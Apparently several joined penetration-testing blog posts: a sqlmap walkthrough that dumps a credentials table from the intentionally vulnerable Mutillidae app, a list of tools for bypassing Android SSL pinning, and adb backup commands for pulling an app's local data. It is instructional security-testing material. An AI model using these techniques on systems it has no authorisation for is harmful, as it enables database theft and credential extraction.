How to use Sqlmap

Sqlmap is automated sql injection detection and exploitation tool written in python. It is very easy to use, straight forward tool to exploit sql injection in Relation Databases. Sqlmap supports variety of DBMS including the most popular ones: Mysql, Oracle, MSSql. The salient features of Sqlmap are:

• Detecting sql injection
• Dump data from databases
• running arbitrary sql commands through it sql shell feature
• running arbitrary OS commands through its OS shell feature

Requirements:

• Python
• Sqlmap

Sqlmap is simple to run. Before doing it practically lets see the most basic and important commands that are required for using sqlmap.

• -r <REQUESTFILE>: Load HTTP request from a file(can be used for both GET and POST methods)
• -u <URL>, --url=<URL>   Target URL (e.g. "http://www.site.com/vuln.php?id=1") (For POST request, this needs to used in combination with --data option)
• --level=<level>: Level of tests to perform (1-5, default 1)
• --risk=<risk>: Risk of tests to perform (1-3, default 1) (for detection keep it 1 and for exploitation, keep it 3)
• --dump: This option is used to dump data from a given database or table. (database is provided by -D <database> and table is provided by -T <table>
• --dump-all: This option is used to dump data of everything (database and table) Sqlmap finds.
• --dbs: To enumerate databases
• --tables: To enumerate tables for a given database(provided using -D). If '-D' option is not provided, current database is default.

For more options, you can refer the sqlmap help by typing:

python sqlmap.py --help

Lets start using Sqlmap. For this demo, I have used a freely available, intentionally vulnerable web app called mutillidae which can be run locally using apache for learning purpose. Its code can be found here.

The page shown below takes username and password as input and shows the user details if both, username and password, are correct.

The request going to the server hosted on the localhost is shown below using burp proxy. Here the parameters username and password within the query string are vulnerable to sql injection. We'll use username parameter for sql injection detection and exploitation using sqlmap.

To run sqlmap, open command prompt or terminal, go to the folder where sqlmap code is extracted and the commands.

To check if username name parameter is vulnerable to sql injection, we need to specify the following things:

• -u: Full url of the web app page to test
• -p: Parameter in the query string or in the request body to be tested
• --data: If POST method is used, specify the request body data here

Sqlmap has determined that the parameter username is vulnerable to sql injection and also enumerated the backend database among other information. Here, Mysql of version 5.0.12 is being used.

Once we have identified that the parameter username is vulnerable, lets specify additionally the dbms as Mysql using option "--dbms=Mysql" and tell sqlmap to enumerate all the databases using option "--dbs". Specifying the dbms, if you know, speeds thing up by not trying payloads of other dbms.

Sqlmap has successfully enumerated the list of databases in the current dbms as shown below.

We'll enumerate the nowasp database and specify the same to Sqlmap using option "-D <database-name>". We'll tell Sqlmap to enumerate tables in nowasp database using option "--tables".

Below screenshot shows the tables from nowasp database.

Looking at the list of tables, it looks like the table accounts may contain sensitive data. We'll try to dump all the data of that table. To tell sqlmap which table's data to be extracted, use "-T <tablename>". Use "--dump" to dump data of the specified table(-T) from the specified database(-D).

As you can see, sqlmap has successfully dumped the data of the table accounts which contains the user credentials.

For POST method, a more feasible way of running sqlmap is using the "-r" option. Store the whole request containing vulnerable parameter inside a file, example shown below, and call the file. The request can be taken from the burpsuite history.

Example command for the same attack shown above is:

python sqlmap.py -r <request-file-name> -p username

Note: The post is only for learning purpose only. Do not perform testing where you are not authorized to.

Tags: sql injection using sqlmap, sqlmap basic, learn sqlmap.

Bypass SSL Certificate or public key pinning implemented in Android mobile application

Hi folks,

Some times during application testing in Android platform, we come across a application which implements SSL (Certificate or public key) pinning. Hence, making it difficult to intercept the traffic using Web proxy during testing.

This post lists down tools already available on the internet for bypassing SSL pinning without touching the application code.

Prerequisites before using the tools:

• The mobile must be rooted.
• The tools used to bypass SSL pinning must be given Super User access/privilege.
• The CA certificate of the intercepting Web proxy must be installed in the mobile Certificate store.

Tools list for applications running on android platform version <=4.3:

1. Cydia Substrate
2. Android SSL Trust Killer

As Cydia Subtrate is no longer supported for versions 4.4(KitKat) and above, below tools can be used for SSL pinning bypass in Android version 4.4 and above.

1. Exposed Framework
2. JustTrustMe

Download and install the apks as per your mobile's android version. Once installed, activate the modules (Android-SSL-Trust-Killer/JustTrustMe) in Cydia-Subtrate/Exposed-Framework and restart the mobile. Now, if everything is configured properly, you can successfully intercept the application traffic.

Extract local storage data of mobile application on non rooted Android devices

This post covers how to extract or get locally stored data of a application on Android devices which is not rooted. In Mobile Appsec, we have to check for  vulnerabilities related locally stored data. For rooted mobiles, it is quite straight forward. We can use even a file manager to dump data.

But for non rooted mobiles, is that not straight forward. Access to /data/data/ , where all the installed applications are, is restricted.

The two ways to extract local data of the application that I know of is:

• Using backup tools
• Using adb (This method uses application backup to extract local data)

I'll be showing how to extract local application data using adb.

I have installed IGLearner application in my mobile for this demo.

Lets start:

Step 1: Set the mobile in debugging mode and connect it to laptop/Computer.

Step 2: Open command prompt and go the folder where adb is present.

Step 3: Before running the actual command, check if your mobile is properly connected by running the command:

adb devices

If your device is listed as  above, move to next step. Otherwise, check your cable or debugging mode is enabled properly.

Step 4: Run the following command to initiate application backup:

adb backup -f <filename>.ab -noapk <package name>

-noapk instruct only to back up local data excluding apk file.

<package name> This is name which the application is stored in /data/data folder. This can be obtained in AndroidManifest.xml file of the application as shown below.

Note: A prompt for backing up the data will be poped up in the mobile as shown below. Do not enter any password. Tap on 'BACKUP MY DATA'.

Step 5: After running the command, the file is stored in the same folder as of adb. Mine is named as data.ab. The backup data is in encoded format. This needs to be decoded.

Step 6: To decode the data, start a linux box (I have set it up on VM). Ensure that 'dd' and 'openssl' packages are installed on it. Copy the backup file on Linux box and in  terminal, go to the folder where the backup file copied and run the following command:

dd if=<backup_filename_with_extension> bs=24 skip=1|openssl zlib -d > data.tar

Note: If you get any error while running this command, repeat the Step 4 again and run this command on new backup file.

Step 7: The data is now decoded stored as tar ball. Extract the tar ball and now you have got the locally stored data of the application,

Step 8: I have found user credentials stored in one of the dbs that were stored locally by the application. This was obtained in the data obtained using above method.

Hope this assist in your testing. Happy testing.